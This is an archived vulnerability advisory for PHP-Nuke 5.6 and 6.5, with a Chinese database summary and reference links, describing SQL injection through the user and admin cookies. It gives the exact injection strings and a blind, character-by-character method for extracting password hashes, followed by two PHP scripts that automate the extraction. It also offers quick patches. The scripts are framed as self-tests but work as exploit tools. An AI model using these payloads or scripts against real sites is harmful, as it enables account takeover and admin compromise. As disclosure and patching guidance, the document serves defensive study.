https://www.securityfocus.com/bid/82683
https://cxsecurity.com/issue/WLB-2007100006
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-323

FranciscoBurziPHP-Nuke5.6和6.5版本存在多个SQL注入漏洞。远程攻击者借助(1)modules.php的uid(user)cookie；和(2)viewlink，(3)MostPopular，或者(4)NewLinksDateaction中Web_Links模块的aid(admin)cookie执行任意SQL命令，该漏洞不同于CVE-2003-0279。

BUGSMAN: serving security from Italy since..hem..well, about 1 year

------------------------------------------------------------------------
-------------

Object: users & admins password hash retrieving

Tested on Php-Nuke 5.6 e 6.5

Vulnerable versions: I've never seen a patch for this so potentially all versions could be vulnerable...

------------------------------------------------------------------------
-------------

Description:

An attacker can obtain password hashes for users and admins, using a particular SQL injection with cookies.

An incredible amount of sites are vulnerable to these attacks.

Note: Since the SQL injection works with cookies, this problem is not prevented by turning GPC_magic_quotes

on.

><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><

USER HASH:

To get the password hash of an user, the attacker just needs a valid account...

The attacker visits www.victimsite.com/modules.php?name=Your_Account sending a spoofed user cookie crafted

in this way:

uid should be: ' or (uname='username_to_hack' and pass like 'a%') or uname = 'valid_username

uname should be:  username_to_hack

pass should be: valid_password

Next stepis to examine the result page. If the page is the login page (the one with textboxes) it means that

the hash of the password to crack is really LIKE 'a%' and the attacker can go on with the next character.

If the page is the details page for the username_to_hack, then it's time to try LIKE 'B%'...

In max 512 guesses the attacker has the hash of username_to_hack and now it is possible to create a spoofed

cookie to be recognized as username_to_hack.

><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><

ADMIN HASH:

To get the password hash of an admin, the attacker only needs to know the name of that admin, and needs that

the Web_Links module should be active and with at least one link:

NOTE: The attacker doesn't need a valid account, and can exploit the bug even if the Web_Links module is

active only for registered members...

The attacker visits www.victimsite.com/modules.php?name=Web_Links&l_op=viewlink&cid=2

sending a spoofed admin cookie crafted in this way:

aid should be: admin_to_hack' and pwd like 'a%

pwd should be: anything you want

Now the attacker examine the page: if the links have the Edit links active, it means the password hash is

really LIKE 'a%' so go on with next character, otherwise go on with LIKE 'b%'

NOTE: This trick works with some modification, with l_op=MostPopular and l_op=NewLinksDate too.

With the hash the attacker can spoof a cookie and get into the admin section of the site.

IMPORTANT NOTE: it is not really a problem to obtain the name of an admin, since the name of the God admin

can be obtained just using this exploit with different injections. So what the attacker REALLY needs is the

Web_Links module active and with at least one link!!!AND NOTHING MORE!!!

><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><

QUICK-AND-DIRTY FIX:

Since I contacted Francisco Burzi, but I didn't get any response I post a quick-and-dirty fix right out of

my brain :)

DISCLAIMER: I TAKE NO RESPONSABILITY FOR ANY KIND OF DAMAGE OR MISWORKING OF THE SITE CAUSED BY MY FIXES.

THESE ARE NOT OFFICIAL PHP-NUKE FIXES SO APPLY THEM AT YOUR OWN RISK!

ANOTHER NOTE: I FIX MY PHP-NUKE THIS WAY AND IT WORKS, IT SHOULD WORK FOR YOU TOO....

FIXING USER EXPLOIT:

in file /mainfile.php, in function is_user, before the line:

if ($uid != '' AND $pwd != '')

add this line:

$uid=addslashes($uid);

FIXING ADMIN EXPLOIT:

in file /modules/Web_Links/index.php, in functions NewLinksDate, MostPopular and viewlink

before the line:

$admin=explode(":",$admin);

add this line:

$admin=addslashes($admin);

then change this line:

$result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid ='$aid'", dbi);

and make it look like this one:

$result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid='$aid' and

pwd='$admin[1]'", dbi);

NOTE: YOU HAVE TO DO THIS FOR ALL THE 3 FUNCTIONS LISTED BEFORE!!!

><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><

ARE YOU WEAK?

Here you can find two php pages that you can use to find out if your site is vulnerable to this attack. Just

upload the pages on the webserver running php-nuke in the same directory for your config.php and open them.

NOTE:THESE SCRIPT ARE VERY POOR-CODED, AND I DO NOT ASSURE THAT THEIR

RESPONSE IS RIGHT!  THEY WORKED FOR ME AND I HOPE THEY WORK FOR YOU TOO! SORRY FOR THE POOR CODING BUT THE

SCRIPTS WERE MADE IN HALF AN HOUR :)

NOTE: BEFORE YOU EXECUTE THE SCRIPT, BE SURE TO PERSONALIZE THE VALUES WHERE INDICATED!!!

This one is to check  the user vulnerability:

><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><

<?php

//Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!

//This one checks for the user password hash retrieving vulnerability

//Note: adjust the script execution time in your php.ini if the script

//takes too long

$server="localhost";

$script="/modules.php?name=Your_Account";

$validaccount="account";// <---Put a valid username here!!!

$validpass="password";   // <---Put the password for the above username here!!!

$account_to_hack="pippo";//<--- Put another valid username here!!!

$md5char[0]="0";

$md5char[1]="1";

$md5char[2]="2";

$md5char[3]="3";

$md5char[4]="4";

$md5char[5]="5";

$md5char[6]="6";

$md5char[7]="7";

$md5char[8]="8";

$md5char[9]="9";

$md5char[10]="a";

$md5char[11]="b";

$md5char[12]="c";

$md5char[13]="d";

$md5char[14]="e";

$md5char[15]="f";

$found=0;

$md5reg="";

function sendToHost($host,$method,$path,$cook)

{

$buf="";

$method = strtoupper($method);

$fp = fsockopen($host,80);

fputs($fp, "$method $path HTTP/1.1n");

fputs($fp, "Host: $hostn");

fputs($fp, "Connection: closen");

fputs($fp, "Pragma: no-cachen");

fputs($fp, "Cache-control: no-cachen");

fputs($fp, "Cookie: user=$cook; lang=italiann");

fputs($fp, "nn");

while (!feof($fp))

$buf .= fgets($fp,128);

fclose($fp);

return $buf;

}

if (!isset($charindex))

$charindex=0;

$found=0;

while($charindex<16){

$md5reg="$md5char[$charindex]%";

$uid="' or (uname = '$account_to_hack' and pass like '$md5reg') or uname = '$validaccount";

$validpass=md5("$validpass");

$cookie=base64_encode("$uid:$account_to_hack:$validpass");

$cookie=str_replace("=","%3D",$cookie);

$data=sendToHost("$server","get","$script","$cookie");

if (eregi("Password",$data)){

$found += 1;

$charindex += 1;

}

else{ $charindex += 1;

Header("Location: ".$PHP_SELF."?charindex=$charindex&charfound=$charfound&curmd5=$curmd5")
;

}

}

echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>";

echo "This one check for the user password hash retrieving vulnerability...<br>";

if($found==16)

echo "You are NOT vulnerable<br>";

else

echo "You are vulnerable!<br>Apply a fix ASAP<br>";

echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>";

?>

><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><

And this one is to check the admin vulnerability:

><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><

<?php

//Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!

//This one checks for the admin password hash retrieving vulnerability

//Note: adjust the script execution time in your php.ini if the script

//takes too long

$server="localhost";

$script="/modules.php?name=Web_Links&l_op=viewlink&cid=1";//<---put a cid that shows a page with links in it

$account_to_hack="admin";//<--- Put the admin username here!!!

$md5char[0]="0";

$md5char[1]="1";

$md5char[2]="2";

$md5char[3]="3";

$md5char[4]="4";

$md5char[5]="5";

$md5char[6]="6";

$md5char[7]="7";

$md5char[8]="8";

$md5char[9]="9";

$md5char[10]="a";

$md5char[11]="b";

$md5char[12]="c";

$md5char[13]="d";

$md5char[14]="e";

$md5char[15]="f";

$found=0;

$md5reg="";

function sendToHost($host,$method,$path,$cook)

{

$buf="";

$method = strtoupper($method);

$fp = fsockopen($host,80);

fputs($fp, "$method $path HTTP/1.1n");

fputs($fp, "Host: $hostn");

fputs($fp, "Connection: closen");

fputs($fp, "Pragma: no-cachen");

fputs($fp, "Cache-control: no-cachen");

fputs($fp, "Cookie: admin=$cook; lang=italiann");

fputs($fp, "nn");

while (!feof($fp))

$buf .= fgets($fp,128);

fclose($fp);

return $buf;

}

if (!isset($charindex))

$charindex=0;

$found=0;

while(($charindex<16)&&($found==0)){

$md5reg="$md5char[$charindex]%";

$aid="$account_to_hack' and pwd like '$md5reg";

$validpass=md5("useless_pass");

$cookie=base64_encode("$aid:$validpass");

$cookie=str_replace("=","%3D",$cookie);

$data=sendToHost("$server","get","$script","$cookie");

if (eregi("Edit",$data)){

$found += 1;

$charindex += 1;

}

else{ $charindex += 1;

//		echo "$data";

Header("Location: ".$PHP_SELF."?charindex=$charindex");

}

}

echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>";

echo "This one check for the admin password hash retrieving vulnerability...<br>";

if($found==0)

echo "You are NOT vulnerable<br>";

else

echo "You are vulnerable!<br>Apply a fix ASAP<br>";

echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>";

?>

><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><

For any suggestion, comments, hiring (I need money too) or any other thing, contact me at:

bugsman (at) libero (dot) it [email concealed]

See ya!!!!

来源:BUGTRAQ
名称:20070927Re:[waraxe-2007-SA#056]-AnotherSqlInjectioninNukeSentinel2.5.11
链接:http://www.securityfocus.com/archive/1/archive/1/480866/100/0/threaded
来源:BUGTRAQ
名称:20030530Php-Nuke:usersandadminspasswordhashesvulnerability
链接:http://www.securityfocus.com/archive/1/323425
来源:SREASON
名称:3185
链接:http://securityreason.com/securityalert/3185